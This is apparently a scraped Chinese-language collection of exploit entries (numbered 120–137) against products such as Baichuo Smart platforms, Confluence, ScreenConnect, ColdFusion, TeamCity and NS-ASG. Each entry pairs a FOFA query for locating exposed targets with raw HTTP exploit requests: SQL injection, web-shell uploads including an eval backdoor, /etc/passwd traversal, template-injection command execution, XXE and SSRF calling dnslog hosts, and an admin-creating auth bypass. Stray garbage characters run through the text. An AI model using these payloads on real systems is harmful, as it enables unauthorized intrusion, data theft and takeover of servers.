POST /sysmanage/sysmanageajax.php HTTP/1.11  z* j3 o/ h2 F1 {1 R
Host: x.x.x.x! {3 J5 f2 Q* o$ `
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee7 ]1 i+ x1 Q2 ]6 T  F* x/ S6 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0! S* q. {  ^" ?/ y  J( x: o' [
Accept: */*5 \2 m% ?) D; O/ \) P) k2 P4 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ N0 ~5 J- q5 J2 z, OAccept-Encoding: gzip, deflate! S) x: `. t) G$ @9 {/ d( x
Content-Type: application/x-www-form-urlencoded;* W& U* T" a6 n: C5 k$ G$ ]7 d9 d
Content-Length: 109
6 |0 F  o* }: @4 O  ~0 iOrigin: https://58.18.133.60:84435 l, l9 P$ [( ?
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php9 N1 M: G- I+ e/ z2 Q
Sec-Fetch-Dest: empty; L9 W- E4 z& J5 S. S, F" [
Sec-Fetch-Mode: cors9 b& h" h3 A4 ~
Sec-Fetch-Site: same-origin2 L2 u3 w; T: |! W/ E# Y/ Z
X-Forwarded-For: 1.1.1.1: z! n0 _6 H4 ]  F
X-Originating-Ip: 1.1.1.1& i% P0 N1 K2 d. ?+ F4 n
X-Remote-Ip: 1.1.1.1
4 g+ `6 U& Q# \2 X" u+ U: r6 AX-Remote-Addr: 1.1.1.1; }4 i1 j: ^" T  c( I: Y) {
Te: trailers4 F* A7 N- Y- p1 q
Connection: close
' X/ b# T# ^8 X# B/ m  ]6 R+ |6 b& Y; G8 y
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
" [& c. x9 N% J0 w6 \# W) [# {7 e; `$ S: ]7 _! a% }+ ~

" M( l8 t. q1 s1 k* j- q120. 北京百绰智能S40管理平台导入web.php任意文件上传
4 x( S! O& r- J2 x  ~2 k8 U- Z: ]CVE-2024-1253/ T, }- X. l6 [  l
FOFA:title="Smart管理平台"6 i! O: U# Q3 `7 h# v# m3 f/ Y
POST /useratte/web.php? HTTP/1.18 ]* r, j0 G& B- p- g
Host: ip:port
/ [3 V  s6 b4 ?" kCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
/ l6 [( b+ x( A1 C6 Q$ a+ D1 dUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
; [8 \" Y$ h3 y" B* H5 u8 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' m, p) H8 o9 G5 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 H. l/ @4 R/ N& Z5 P7 ^
Accept-Encoding: gzip, deflate
' k/ S) l9 L$ o4 F5 V% U2 cContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
" g3 S* z2 `$ W+ UContent-Length: 597
9 P* @9 X& d- [$ Y# aOrigin: https://ip:port: {. u" j# b/ S/ H- @% D
Referer: https://ip:port/sysmanage/licence.php( A1 B- i3 |) X; T+ O0 b$ M
Upgrade-Insecure-Requests: 15 g6 Y% E2 x. y) B
Sec-Fetch-Dest: document! G! Y/ C2 l) |" d  F
Sec-Fetch-Mode: navigate+ ?3 l3 B! Z' h8 [4 o2 ~
Sec-Fetch-Site: same-origin
# r/ _* r6 d4 }9 L: l* N1 qSec-Fetch-User: ?1
: U' t) r- f; m! x& N" k( l; V; k9 TTe: trailers
6 S, e' F$ p6 m* [- g9 oConnection: close" f' S! P! Y$ J& J: d+ Z
* \1 H( V0 A" ]; A9 V  a, B
-----------------------------42328904123665875270630079328
( R3 D8 C+ n* o! QContent-Disposition: form-data; name="file_upload"; filename="2.php": P" w. e! Z' W# T! x$ Y* o
Content-Type: application/octet-stream
8 Y. t. w: L7 Q* Z) c4 }  H; Z! N9 H$ O
<?php phpinfo()?>0 s. b; I- o+ C. J: E1 Z
-----------------------------42328904123665875270630079328: G4 M8 {! [9 x# D3 J0 A2 U
Content-Disposition: form-data; name="id_type"
# l! B! U) q9 Q# H9 C2 j  e
5 H% N1 |# c: v: \1
& n, n1 g3 E- l) n-----------------------------423289041236658752706300793284 B+ @5 j3 X3 a1 V1 G& R
Content-Disposition: form-data; name="1_ck"
, ]$ L/ j0 B) H3 ^. f3 F) `" I/ a
1_radhttp
: \4 ~# u! p4 ^8 @" T-----------------------------423289041236658752706300793286 C8 f: H% R) V& _6 ?3 w
Content-Disposition: form-data; name="mode"
  Z" r! V) D" Q( ]+ p. g3 i- A: F2 t, O: F
import
% P. X( t1 s* K8 D% {* @-----------------------------423289041236658752706300793281 g5 N9 o, s- F  i4 t
7 @/ a3 o1 x6 s4 r$ [( f
! ~, d) @# M1 v+ N3 S( S( U, c3 Z
文件路径/upload/2.php& e) O/ l' T) r, r4 x5 Z; D
5 \9 w& C# O+ i( }; g8 \8 y
121. 北京百绰智能S42管理平台userattestation.php任意文件上传" L0 D# U! c0 r; k+ {, R. S
CVE-2024-1918
3 w; M( Y3 x* l1 }3 Z  hFOFA:title="Smart管理平台"
, v+ H6 R# c5 x$ {1 O, [$ aPOST /useratte/userattestation.php HTTP/1.1
! p: [: }2 \  u# l4 L  s9 q6 BHost: 192.168.40.130:8443' {8 W2 i' c; q( o* d) T5 f
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
7 u2 Q+ }) [0 J' T! e" N8 dUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko2 \& i/ q% o# q  |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 ^) k! M$ w, |5 o$ L0 x6 ~# I4 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' i9 d1 `; p; K' q0 n* Y; h9 U
Accept-Encoding: gzip, deflate
* e  F3 s: @1 f, `' \/ A; j3 q6 f1 _Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 ~5 X+ U; V" L( [* y; g- tContent-Length: 592
  m+ }2 G; r0 v5 A) ~4 qOrigin: https://192.168.40.130:8443
9 V0 p6 F0 B' r; _Upgrade-Insecure-Requests: 1
' h% a, j7 d' C7 S0 T- X: h  k6 K5 ISec-Fetch-Dest: document
8 q! R( {, S6 M8 D: c/ z2 RSec-Fetch-Mode: navigate
  Z& G. M- }$ }- w! hSec-Fetch-Site: same-origin: a8 V6 P0 i) h' X. X, S
Sec-Fetch-User: ?1. x! l$ i2 }6 [. ^. h  }
Te: trailers& w% w& ]8 t. t# K
Connection: close
! I; E1 j0 G5 a8 i5 w9 H# t2 T7 o  I: Y; K5 y
-----------------------------42328904123665875270630079328
. I% I5 h4 L+ n' |Content-Disposition: form-data; name="web_img"; filename="1.php"
' f% T8 }7 }. UContent-Type: application/octet-stream* K' `) |' }& {

$ C! v, H5 _! Y$ \<?php phpinfo();?>
. I1 b0 @/ |2 G, Z3 g-----------------------------42328904123665875270630079328
$ k; O1 T) D  ]# LContent-Disposition: form-data; name="id_type"9 s# Q; B9 K7 g* X) e1 h# D
- c4 s) @# B$ ~1 A  }6 _. [+ V
1! E5 j- p3 I+ u8 @+ x2 l" X
-----------------------------423289041236658752706300793283 v% B& f* R: I
Content-Disposition: form-data; name="1_ck"
+ Q  N8 ]" U# k  H( j. S5 A! `4 J5 T, w7 k( i5 I" t' y
1_radhttp/ K5 U7 h1 l! ]" g  t5 Z
-----------------------------42328904123665875270630079328
$ {5 _2 S% R4 N6 N7 \; jContent-Disposition: form-data; name="hidwel"$ \/ Z9 r" W0 d$ P1 m" `9 K  E
& g8 |( T8 q: b% C# P# `& ~  Q% f+ f
set/ b5 r7 m" x9 ^4 x+ ^" G
-----------------------------42328904123665875270630079328
/ x: N; l( M& V$ `
  ~5 V' g! H' R# ]9 C
+ a' O# ^" [1 {- O: o; v$ bboot/web/upload/weblogo/1.php2 s( t7 v) w" f' m$ |

$ \1 F$ ^7 A' ^8 p* [4 q122. 北京百绰智能s200管理平台/importexport.php sql注入
* u- h8 t. ]* F: eCVE-2024-27718FOFA:title="Smart管理平台"
2 B' l0 P- A9 o7 T1 {其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
" V8 }8 Z% H2 m8 n( zGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
0 b- a" m1 l/ _: l" iHost: x.x.x.x" F- c# V' i8 S
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0$ C( A. T* V8 w  W6 @4 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ U2 ?9 O- {; [/ v! wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! S7 B( u* {. D. r. J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 k* d# U, x$ Y. F5 @- x
Accept-Encoding: gzip, deflate, br
1 s" O9 P* M' r9 N, R" ~6 DUpgrade-Insecure-Requests: 1
; B1 m8 ?( V: F# {9 y( x! vSec-Fetch-Dest: document- \1 H- T' t7 K$ R  M4 v- I
Sec-Fetch-Mode: navigate
. y! s) I' q5 ?0 C9 y  ^" g( XSec-Fetch-Site: none
% R0 V) C% P' {& H# U6 ASec-Fetch-User: ?1
+ B( H2 [4 y' z/ ?/ \: A7 v% \8 eTe: trailers
( n- R5 J+ |+ g: [' z0 f% d4 I- N, VConnection: close# L) O# x* F; \. p: E

7 Q* K# s: i5 E; `  G) x
, d! U! I6 V" n( ?5 `: ^" o3 E123. Atlassian Confluence 模板注入代码执行- H) `' J2 x% C# B( t) R
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
3 b, M* N# V( x3 B/ x5 O" \0 `POST /template/aui/text-inline.vm HTTP/1.1
$ V1 V8 r$ x0 W1 p! t: VHost: localhost:8090
7 m9 H0 X/ q7 U; x1 }Accept-Encoding: gzip, deflate, br+ Q* v5 T( n% \+ \& V
Accept: */*  |1 {1 G+ ?; O, y/ a# g
Accept-Language: en-US;q=0.9,en;q=0.8
# s  V" ^- B0 M+ \# Z# GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36+ n- y$ ?5 g) t0 ~% S+ J2 J9 b4 }
Connection: close
( C  r6 C* v4 [+ MContent-Type: application/x-www-form-urlencoded
. a0 Q  B) a  W9 `8 R8 d0 E4 R0 M, J# `$ q- e6 S
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
" i5 H  C1 Z2 S
0 C4 {# j, q6 k( V& `% t5 O9 O' g7 r0 L" d
124. 湖南建研工程质量检测系统任意文件上传* U& D3 C4 D4 e6 o0 f* f# t7 A/ g7 X
FOFA:body="/Content/Theme/Standard/webSite/login.css"
2 h" P3 m4 n0 q2 FPOST /Scripts/admintool?type=updatefile HTTP/1.1' T4 f, ~/ R- M
Host: 192.168.40.130:8282
8 \- j- R% n4 G$ _  b' S" d. p2 X6 EUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
$ h% [* R: T) r$ [. q9 ?Content-Length: 726 p/ u) c; Y" q/ L  v  ^0 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8, \; x, p4 h& {# B, t9 v. {
Accept-Encoding: gzip, deflate, br6 q  v$ X8 U1 j( J# d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; S6 p% X% m& P3 VConnection: close
" C! B' n' Q; N$ gContent-Type: application/x-www-form-urlencoded1 y; ^: k, D! m- \, K

0 u1 h3 g8 _7 w2 A0 l2 j# sfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
" J: z+ |3 m. W( |9 \5 |6 U8 L# @7 f$ y- Z$ K* y+ t1 \

0 s' R+ x+ O, W2 V* Khttp://192.168.40.130:8282/Scripts/abcgcg.aspx% F9 t$ x/ u- G) Y  p' w6 D! ^( ?

1 K- ~8 I& @' R7 ~125. ConnectWise ScreenConnect身份验证绕过
' Y; k/ c8 u, K& C  ]8 {3 c' qCVE-2024-1709
5 w5 W2 C0 A: jFOFA:icon_hash="-82958153"
8 k: g- T* u/ d7 J2 Fhttps://github.com/watchtowrlabs ... bypass-add-user-poc
' F; Z" @9 l+ r9 K7 c( H" b: {2 ~$ b# k7 m9 \6 n8 m- b" f

7 n, d* R7 C7 b2 P6 Y4 {使用方法. ?' ~% z/ P! S8 I- `( e1 a
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
# ?+ S" Y( s2 H+ U" T% E  r6 Y8 a/ k2 A# y- u
0 Z5 N3 L; ?, b( B0 l  t$ P# y
创建好用户后直接登录后台,可以执行系统命令。" i5 v* j! J3 X5 y; E5 z  a
- l4 J6 M% W, \' Q4 N
126. Aiohttp 路径遍历  ]1 ^3 f9 E- [/ h( v2 }1 h
FOFA:title=="ComfyUI"4 g# Q  w3 r$ k; D
GET /static/../../../../../etc/passwd HTTP/1.1- X% V( Y0 _5 M2 W# {4 n- w
Host: x.x.x.x
( A. N4 D0 o% l  q; d% }" dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" u* M, P8 W/ d, F; V& q4 [1 [
Connection: close
8 {/ I2 C3 b& A0 oAccept: */*
/ t: n: _# f% L: A1 J. d2 NAccept-Language: en
, S; H$ v: a9 ^Accept-Encoding: gzip
8 e$ S$ d# p( }% I! x6 i1 V( @9 f0 u' _7 t. K( l. J
' d$ z4 J9 Z7 r  l9 A
127. 广联达Linkworks DataExchange.ashx XXE
. v8 a" c0 j# |1 l! B% BFOFA:body="Services/Identification/login.ashx" 0 n7 A" n4 Q( n- f; |
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
4 ]: M6 Q& l# iHost: 192.168.40.130:8888
, q3 |8 b0 p3 L5 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.365 U. w9 Y/ z- x1 W/ P& S: ^/ B
Content-Length: 415
9 o; X' Q" P0 L" rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# M$ O, b0 w3 A7 s* T
Accept-Encoding: gzip, deflate  [  Y+ m* O& Y$ H9 a
Accept-Language: zh-CN,zh;q=0.9
3 k$ @/ I. e3 e# s" sConnection: close
8 [# V, b1 p' r% \9 W3 }Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
% l2 L% o9 K/ L7 NPurpose: prefetch) }- m* T0 e$ M7 `/ }. b. `
Sec-Purpose: prefetch;prerender! L1 W1 V- h  K
( }3 m. U7 t$ o9 l/ O
------WebKitFormBoundaryJGgV5l5ta05yAIe08 K  S  e3 U6 [: S
Content-Disposition: form-data;name="SystemName", a6 ]& @  U( z0 P
, @7 b% `0 T9 o1 e
BIM
- W& B( k5 V4 n6 q1 b------WebKitFormBoundaryJGgV5l5ta05yAIe0
- f- w1 E/ O% H$ ^% U3 x! d/ sContent-Disposition: form-data;name="Params"% j- \* B& @# n2 W1 v: V
Content-Type: text/plain
- k; h$ @7 E: c  ?% L: J% z8 Q( z! _
<?xml version="1.0" encoding="UTF-8"?>- s$ f( {" \9 A, s" D5 X0 P( K$ s
<!DOCTYPE test [
: N* h) ?* @6 \- N3 G7 G# ?<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
6 f3 B9 p4 L' I3 B: }9 H( d]' M! l+ _3 k+ Y7 w4 O4 u
>
0 @. p, s2 N1 X9 e6 d3 m4 y, }<test>&t;</test>
) U0 C$ z$ ]! y$ o+ W------WebKitFormBoundaryJGgV5l5ta05yAIe0--& I; h% R( A2 {# [
3 w  u& i6 V% p9 S& _) B
' b7 J6 L7 y6 r- Q
1 i/ Q9 z6 H8 k  w
128. Adobe ColdFusion 反序列化
' @" l4 C" n3 z+ e1 Y& QCVE-2023-382035 ?2 s5 _) D  y8 T
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)( _1 a2 {5 ~5 |  ~' s
FOFA:app="Adobe-ColdFusion"& u; C# {- E1 X& b& P' G
PAYLOAD
" P& }: r8 d/ \* @8 [7 _# ~0 B1 ~  n' X1 a+ k) j. |
129. Adobe ColdFusion 任意文件读取/ n: \5 B) a/ u  W
CVE-2024-20767
2 _8 k) b) F# `: a. ?FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
# T9 T7 O5 |: @2 y2 P第一步,获取uuid
5 ?+ {& x9 Q% Y: W4 C& s. ]GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
  S! ^& t4 V, q0 S8 R$ EHost: x.x.x.x
- f) Z7 {% b- g8 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- U+ W7 v7 c, V" ?- {+ R7 PAccept: */*
4 r$ }: Z: p) y' i9 R+ p' AAccept-Encoding: gzip, deflate) T( U+ v$ ]' Y$ j( ~
Connection: close
4 L& l* f: e2 j( F/ g0 V- R+ e: b9 n
0 U; q8 I4 s9 l- k" ~3 [+ K1 L
$ Q: `$ q! J" b0 \+ w  G5 m第二步,读取/etc/passwd文件. l. |) d3 u( T% X
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.14 w4 E& X& a# @% x- }
Host: x.x.x.x5 t, W; E" k& b1 R3 ~8 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36( C6 c" T) ~0 M& r: K7 U
Accept: */*4 X7 ]+ \1 L- \9 D
Accept-Encoding: gzip, deflate
& S: J: W) j( WConnection: close5 y1 D: e4 B+ N
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
. @3 ~. A3 v, t4 ^$ s6 ?
; \& [& Z! z+ s% ^) h  j3 R& [" L
( b' F' s/ [; E130. Laykefu客服系统任意文件上传
" R3 D& F5 i( X/ tFOFA:icon_hash="-334624619"
- H/ Q  C) J- f. bPOST /admin/users/upavatar.html HTTP/1.1
7 [5 S: x1 _- |6 e1 V. p9 tHost: 127.0.0.1$ F8 Y' @0 w, Z- Q( A5 L
Accept: application/json, text/javascript, */*; q=0.01
  _( A% i: R$ J2 Z" X2 bX-Requested-With: XMLHttpRequest( z5 a; I3 w+ @7 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
1 l, x( U1 [6 Z! v" {Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
! K; `  X% L5 r& @Accept-Encoding: gzip, deflate0 W6 t! Y- h4 L# W8 F
Accept-Language: zh-CN,zh;q=0.9# h- u7 }5 f/ n. x1 I! q
Cookie: user_name=1; user_id=36 h  [* y  ~  B0 n
Connection: close
- b  E- j0 Z1 G  Y  T8 Z: g' y0 t( b/ B# c1 s
------WebKitFormBoundary3OCVBiwBVsNuB2kR
' M+ h9 q# s, ]1 u* F& `  rContent-Disposition: form-data; name="file"; filename="1.php"3 x1 X( B/ Z+ e: Q9 \
Content-Type: image/png& X" b( S! v$ L

# u( T( c$ }/ L) d, q7 c<?php phpinfo();@eval($_POST['sec']);?>
! a/ }( V/ B/ a; y9 L6 o+ w" E------WebKitFormBoundary3OCVBiwBVsNuB2kR--) j/ ^9 C/ }9 ]$ Z5 T3 l

% {' [5 Z1 P  l0 X1 `$ q9 O' s% H5 i1 ]6 L6 [7 T
131. Mini-Tmall <=20231017 SQL注入: a$ _1 d/ S  S9 {
FOFA:icon_hash="-2087517259"
% Q& Y& c7 Q$ r# r7 S( o5 I后台地址:http://localhost:8080/tmall/admin
2 v, H% e4 q" Z4 g& Q5 ehttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)" v, y- G8 ~) r/ C) k2 r% L

) E6 o" z( l! \# x& A/ ~132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
% P! p$ P" H6 U2 `CVE-2024-27198
2 t# f, y8 m1 g3 D" L8 }/ ]) T7 eFOFA:body="Log in to TeamCity"* b4 V/ J$ F! Q$ g/ I
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.11 C  O. x1 e$ f
Host: 192.168.40.130:8111
% U0 s- s$ d. g! l$ A& C) W% b+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 A( p: X0 D) A) r) n. s3 e* PAccept: */*
# P7 D4 n2 n! M8 o; YContent-Type: application/json
9 C, L4 U& x% H& U8 eAccept-Encoding: gzip, deflate/ M: E' D3 ?& E) j: u; i2 q/ D

! p9 c2 H# Q% m% ^$ ?" v{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# z5 w& O8 s1 ~% `$ z

+ e6 D1 |. l7 e; ~2 v/ y- U
* G0 t; F) j& Q0 \4 z# Z* r" `$ aCVE-2024-27199
# S2 ~# `/ G# l( p1 H/ F/res/../admin/diagnostic.jsp
5 g+ Q6 D4 f* W4 V6 o2 ~5 A/.well-known/acme-challenge/../../admin/diagnostic.jsp+ O; `% o; |, f- v2 O
/update/../admin/diagnostic.jsp* e& y; V0 @1 _* o
6 h+ d: P& g- W! M$ x7 Z/ ^: T
$ K8 c& U, ~% {" [
CVE-2024-27198-RCE.py
& ^. E) B2 _) S; f4 v7 ]6 ~0 `; ?! g& R& a# q
133. H5 云商城 file.php 文件上传- `0 p2 S9 x3 n: L" C
FOFA:body="/public/qbsp.php"
5 |% T$ W+ b  t/ `' n$ mPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1. P8 ^$ M* s. b- y* C8 T
Host: your-ip
! J* c+ s; p1 ]3 V! bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 g; d5 ^" n8 s; o  d. o) ?, e5 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx4 h: _4 j& c' p. e, G, d8 e

8 e4 ^( q9 U- K, v5 @------WebKitFormBoundaryFQqYtrIWb8iBxUCx3 w4 d+ o3 }" V) }4 }2 l
Content-Disposition: form-data; name="file"; filename="rce.php"$ P! O- z. j: Q% a4 I4 f
Content-Type: application/octet-stream: u6 f# d, B8 d% K! U1 G2 k

% x: [$ a5 ]7 x/ W9 D$ J<?php system("cat /etc/passwd");unlink(__FILE__);?>
2 I, Q( x+ c2 h( v* |------WebKitFormBoundaryFQqYtrIWb8iBxUCx--# r! a, x# s0 I/ J9 }% i) G
. b1 n8 d  k/ N9 ]

3 F% o$ {2 a# q2 D4 _7 {2 u" M/ [( m5 G$ X) ~
134. 网康NS-ASG应用安全网关index.php sql注入
* D9 x( S8 w% S& u6 f; HCVE-2024-2330
1 D$ g$ X6 {# W; m+ I1 m/ f( z- K' RNetentsec NS-ASG Application Security Gateway 6.3版本$ m& m: F+ ^$ Q- }* [$ V
FOFA:app="网康科技-NS-ASG安全网关"
" v  h7 G; R+ u8 @. u5 b5 mPOST /protocol/index.php HTTP/1.1
2 @8 I; d% Y  a( F: MHost: x.x.x.x
' y4 z% @% C" O2 ?Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
" Q) B6 }2 h& u6 h2 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0- w9 ?6 \  |4 {* ^
Accept: */*
! f9 o% Y, j* ^# `. P8 w( VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ E% Y% _2 u7 h9 z" S7 v
Accept-Encoding: gzip, deflate& ?. @% M& c5 G5 n$ ]2 O
Sec-Fetch-Dest: empty4 U' r! ~! [) p3 R$ x8 X
Sec-Fetch-Mode: cors
0 w( u3 E5 ]0 K" \8 `7 |, xSec-Fetch-Site: same-origin" |8 z0 o) v) F
Te: trailers/ c9 V2 z6 f/ I! k3 l
Connection: close
( N) U, w/ k/ k* ]Content-Type: application/x-www-form-urlencoded
8 {7 ^, p. u' t7 g+ AContent-Length: 263. J8 U) w! |' i6 o& u
$ _( A' o  {2 e% Q
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}, M' i, d* j9 f/ k8 \2 e  W

9 ^$ F7 o/ X( f5 p, N1 u
/ _7 j$ z% `# d( w3 W% J0 Q135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 ?* b0 E9 _. d* V& i4 g' M9 RCVE-2024-2022
  i: G& z4 A; c5 C: M% y" f' bNetentsec NS-ASG Application Security Gateway 6.3版本9 ?: d7 q; m2 b) v0 A  F& {8 w
FOFA:app="网康科技-NS-ASG安全网关"* D: p4 P! m; L+ l. j, q
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
& ]5 N3 K5 ]' N, @+ w9 {7 PHost: x.x.x.x) p; L0 Q4 n2 R% U+ Y+ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' q. k2 C0 ^. u' M$ {. NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% D. N" n2 |' x3 Z' q
Accept-Encoding: gzip, deflate
' {0 T5 {0 g% s; y- f: @1 k2 }0 UAccept-Language: zh-CN,zh;q=0.9
/ P& B# V$ W6 gConnection: close( _7 N0 `! _0 F2 H$ z
8 ~/ ~5 b$ x2 |' _! B

* j4 }' p; N% ~- D$ y0 v7 z136. NextChat cors SSRF
0 r; h7 G& O5 L( H4 a6 |" QCVE-2023-49785! x7 J  H6 m/ M: ?# @* d2 @
FOFA:title="NextChat"
: c/ Q. d% ]6 _# O2 F3 l* lGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
0 C  \3 L* s; lHost: x.x.x.x:100006 \) X% s, {. i& a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. F0 H( l( R) n4 x9 ^, g
Connection: close
7 k. y* `7 }6 WAccept: */*
7 ~3 S( l) g" P0 OAccept-Language: en
. X5 k8 d4 f& G% e3 @* JAccept-Encoding: gzip
0 _, j& s: A8 n# G: r# e  ~& F) w6 Y

$ c1 s4 Y* X# P4 f* ^- K137. 福建科立迅通信指挥调度平台down_file.php sql注入! s- b2 v7 E" N" v
CVE-2024-2620
; S. n9 ?% b- |6 M& xFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ v1 d& F6 v8 l5 B
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1% n$ L4 a9 I' y' S; Q/ K3 c1 E
Host: x.x.x.x, g" Z2 `; W3 t  R* y5 c- z/ D4 D% B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) O0 _1 ~# l. }9 c* Z: j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* Q1 ]- T6 y% R3 H* m# VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) s5 {, H; E  v# e" S6 n9 i" U5 `Accept-Encoding: gzip, deflate, br  }+ k* ^" }3 ^, y1 D* B* }7 y
Connection: close
+ G- @% c) X9 M$ ~, ~! xCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj+ N  }& Z& S/ E' O2 R
Upgrade-Insecure-Requests: 1
